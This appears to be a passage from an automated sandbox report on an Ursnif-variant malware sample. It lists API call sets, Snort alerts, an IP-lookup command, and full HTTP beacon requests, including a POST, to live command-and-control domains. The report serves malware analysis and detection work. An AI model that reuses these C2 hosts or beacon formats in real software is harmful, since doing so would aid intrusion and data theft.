                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdbXP source: powershell.exe, 0000000F.00000002.1028629479.0000029E4CF68000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdbXP source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdbXP source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdbXP source: powershell.exe, 00000011.00000002.994879898.0000026445852000.00000004.00000001.sdmp
                      Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: loaddll32.exe, 00000000.00000002.1185778870.000000006E4FF000.00000002.00020000.sdmp, data.dll
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457A5F6 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_0457A5F6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457CC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,0_2_0457CC4A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_0457198F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04580BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_04580BC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BBCC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_04BBCC4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_04BB198F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BC0BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_04BC0BC5
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0097198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,49_2_0097198F
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00980BC5 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,49_2_00980BC5
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0097CC4A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,49_2_0097CC4A

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49776 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49777 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49778 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49778 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49779 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49779 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49780 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49780 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49781 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49781 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49862 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49862 -> 194.147.86.221:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: init.icecreambob.com
                      Source: C:\Windows\explorer.exeDomain query: art.microsoftsofymicrosoftsoft.at
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 194.147.86.221 80Jump to behavior
                      Uses nslookup.exe to query domainsShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      May check the online IP address of the machineShow sources
                      Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                      Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                      Source: global trafficHTTP traffic detected: GET /HKPpcwlwrfQkTmv8P06H/3Wxv_2FnSDQGUBdPXw9/RYY8q690tWMw7_2FqiZKDR/tihJyHYSdUWc_/2Bk0Blz4/Ugw940qxXbfuHBW4kjFJy7m/qeLyDgVQe2/v1ANC_2B2jNzm_2B0/UCUkcrNLM1Qj/GKGs5Yns4a1/y2RcxBlEBBMDgc/vui4nnWlDWEvxcnjXpxFk/PDKIsTs7GBXCyaSr/TwT_2BF1pJMPI8c/ynG0YGZIeokgeQwjHf/KZMBUT4_2/BvirsVJDlpOpDnwD83YS/kQDSJlsGXWqTNVyxDqs/KuldZQ_2BlbTtmbV3TyeLX/ai8Q6i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
                      Source: global trafficHTTP traffic detected: POST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
                      Source: Joe Sandbox ViewASN Name: NETRACK-ASRU NETRACK-ASRU
                      Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: rundll32.exe, 00000003.00000003.841471789.0000000000AE2000.00000004.00000001.sdmpString found in binary or memory: http://init.icecreambob.com/
                      Source: rundll32.exe, 00000003.00000003.826552250.0000000000AE2000.00000004.00000001.sdmpString found in binary or memory: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Imm
                      Source: rundll32.exe, 00000003.00000003.831975638.0000000000AF4000.00000004.00000001.sdmpString found in binary or memory: http://init.icecreambob.com/l
                      Source: rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmpString found in binary or memory: http://init.icecreambob.com/lbK
                      Source: rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmpString found in binary or memory: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsb
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cmg
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.co/xa
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.ux
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobp/
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.micro/1
                      Source: powershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 0000000F.00000002.963606313.0000029E48941000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.935740628.0000026442311000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RuntimeBroker.exe, 0000002E.00000000.997237662.000001B4FB11D000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/spotify:
                      Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermsW~
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                      Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                      Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknownDNS traffic detected: queries for: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /HKPpcwlwrfQkTmv8P06H/3Wxv_2FnSDQGUBdPXw9/RYY8q690tWMw7_2FqiZKDR/tihJyHYSdUWc_/2Bk0Blz4/Ugw940qxXbfuHBW4kjFJy7m/qeLyDgVQe2/v1ANC_2B2jNzm_2B0/UCUkcrNLM1Qj/GKGs5Yns4a1/y2RcxBlEBBMDgc/vui4nnWlDWEvxcnjXpxFk/PDKIsTs7GBXCyaSr/TwT_2BF1pJMPI8c/ynG0YGZIeokgeQwjHf/KZMBUT4_2/BvirsVJDlpOpDnwD83YS/kQDSJlsGXWqTNVyxDqs/KuldZQ_2BlbTtmbV3TyeLX/ai8Q6i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
